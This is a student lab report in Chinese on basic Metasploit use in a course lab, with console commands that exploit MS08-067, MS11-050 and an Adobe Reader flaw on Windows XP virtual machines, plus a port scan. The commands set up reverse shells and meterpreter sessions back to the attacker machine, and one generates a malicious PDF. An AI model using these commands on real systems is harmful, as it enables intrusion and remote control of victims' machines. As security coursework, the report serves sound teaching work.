2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode
  • exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。
  • payload:攻击载荷,如后门等攻击代码。
  • encode:用来编码,用于伪装

实践过程记录

1.Windows服务渗透攻击——MS08-067安全漏洞

①攻击机:kali ②靶机:windows XP SP3(English)

可以ping通。

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf >search ms08-067//使用search命令搜寻有关漏洞MS08_067的相关信息

  • msf > use exploit/windows/smb/ms08_067_netapi

  • msf exploit(ms08_067_netapi)> show payloads//查看可以供我们使用的payload:

  • msf exploit(ms08_067_netapi)> set payload generic/shell_reverse_tcp //tcp反向回连

  • msf exploit(ms08_067_netapi)> set LHOST 192.168.72.131攻击者ip

  • msf exploit(ms08_067_netapi)> set LPORT 5319

  • msf exploit(ms08_067_netapi)> set RHOST 192.168.72.135 //靶机ip

  • msf exploit(ms08_067_netapi)> set target 0 //自动选择目标系统类型

  • msf exploit(ms08_067_netapi) > exploit

  • 成功!攻击结果如下:

2.浏览器渗透攻击——MS11-050

①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf > use windows/browser/ms11_050_mshtml_cobjectelement

  • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连

  • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131 //攻击机ip

  • msf exploit(ms11_050_cobjectelement) > set LPORT 5319 //攻击端口固定

  • msf exploit(ms11_050_cobjectelement) > set URIPATH rhl19 //统一资源标识符路径设置

  • msf exploit(ms11_050_cobjectelement) > exploit

  • 成功得到Local ip:

  • 用靶机访问http://192.168.72.131:8080/rhl19 ,出现了弹窗警告:

  • 尝试修改一下ie浏览器的相关设置,降低其安全等级

  • 第二次在IE中访问以上网址还是失败了...很难受...

3.针对客户端的攻击Adobe

①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf > use windows/fileformat/adobe_cooltype_sing

  • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连

  • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131 //攻击机ip

  • msf exploit(adobe_cooltype_sing) > set LPORT 5319 //攻击端口

  • msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf //设置生成pdf文件的名字

  • msf exploit(adobe_cooltype_sing) > exploit //攻击

  • 成功生成pdf。

  • 由于生成的文件是隐藏文件使用copy命令把其复制到别的目录中去。

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip

msf exploit(handler) > set LPORT 5319 //攻击端口固定

msf exploit(handler) > exploit
  • 再把靶机上打开pdf文件,回连成功。

4.Metasploit之——信息收集模块

一、扫描端口

  • msf > use auxiliary/scanner/portscan/syn(使用portscan模块)
  • msf auxiliary(syn) > show options
  • msf auxiliary(syn) > set RHOSTS 192.168.72.137(目标)
  • msf auxiliary(syn) > set THREADS 50(线程)
  • msf auxiliary(syn) > exploit

    由于扫描时间比较长,提前终止了。

二、扫描靶机的TCP端口使用情况

  • 输入以下指令:

  • run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况

实践总结及体会

本次实验没有什么特别难的地方,主要在环境的配置上,自己配置了好久但还是不成功,最后拷了配置好的虚拟机。体会到了metasploit攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。必须要在特定环境和特定触发条件下才能成功。感受到了实践和真实攻击的差距。

# 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用的更多相关文章

  1. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

  2. 20155308『网络对抗技术』Exp5 MSF基础应用

    20155308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

  3. # 2017-2018-2 20155319 『网络对抗技术』Exp8:Web基础

    2017-2018-2 20155319 『网络对抗技术』Exp8:Web基础 一.原理与实践说明 1.实践具体要求 (1).Web前端HTML(0.5分) 能正常安装.启停Apache.理解HTML ...

  4. # 2017-2018-2 20155319『网络对抗技术』Exp7:网络欺诈防范

    2017-2018-2 20155319『网络对抗技术』Exp7:网络欺诈防范 一.原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2. ...

  5. # 2017-2018-2 20155319『网络对抗技术』Exp6:信息收集与漏洞扫描

    2017-2018-2 20155319『网络对抗技术』Exp6:信息收集与漏洞扫描 实践内容 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.O ...

  6. # 2017-2018-2 20155319『网络对抗技术』Exp4:恶意代码分析

    2017-2018-2 20155319『网络对抗技术』Exp4:恶意代码分析 实验目标与基础问题 ++1.实践目标++ 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析 ...

  7. # 2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践

    2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践 1.实验准备 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用s ...

  8. 2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  9. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实 ...

随机推荐

  1. CSS 小结笔记之em

    1.为什么使用em em也是css中的一种单位,和px类似.很多人会疑惑为什么有了px之后还要使用em,而且em使用起来相对于px来讲比较麻烦. em主要是应用于弹性布局,下面给出一个小栗子说明em的 ...

  2. Oracle EBS INV 更新状态

    使用API改变现有物料状态,改成如下:On-Hand, Subinventory, Locator, Lot & Serial.参数使用如下:H, O, S, Z, L.对应如下: 'H' - ...

  3. Sql server的Merge语句,源表中如果有重复数据会导致执行报错

    用过sql server的Merge语句的开发人员都应该很清楚Merge用来做表数据的插入/更新是非常方便的,但是其中有一个问题值得关注,那就是Merge语句中的源表中不能出现重复的数据,我们举例来说 ...

  4. ubuntu下配置时间同步NTP

    1参考文献: 1.鸟哥的Linux私房菜:第十五章.时间服务器: NTP 服务器(强烈建议看完) 2.http://www.crsay.com/wiki/wiki.php/server/centos/ ...

  5. MySQL锁系列之锁的种类和概念

    转自:http://keithlan.github.io/2017/06/05/innodb_locks_1/ 锁是MySQL里面最难理解的知识,但是又无处不在. 一开始接触锁的时候,感觉被各种锁类型 ...

  6. ln -s 软连接介绍

    软连接(softlink)也称符号链接.linux里的软连接文件就类似于windows系统中的快捷方式.软连接文件实际上是一个特殊的文件,文件类型是I.软连接文件实际上可以理解为一个文本文件,这个文件 ...

  7. 向kindle传送文件

    自从有了kindle以后,只要不是pdf的电子书,基本上都用kindle来看了,毕竟水墨屏还是很护眼的,但是这就带来了向kindle传输文件的问题 绝大部分的电子书用邮件推送就可以解决了,但是还有一些 ...

  8. [Spark SQL_1] Spark SQL 配置

    0. 说明 Spark SQL 的配置基于 Spark 集群搭建  && Hive 的安装&配置 1. 简介 Spark SQL 是构建在 Spark Core 模块之上的四大 ...

  9. mysql数据库中导入txt文本数据的方法

     安装好MySQL和Navicat 8 for MySQL 通过Navicat 8 for MySQL创建数据库test. 2 在数据库test上创建测试数据表student(主键ID,姓名,年龄,学 ...

  10. 【Alpha 冲刺】 6/12

    今日任务总结 人员 今日原定任务 完成情况 遇到问题 贡献值 胡武成 建立数据库 未完成 表结构文档已设计好,服务器mysql刚配置完成,但是,SpringMVC框架还没有熟络,不清楚如何使用该框架去 ...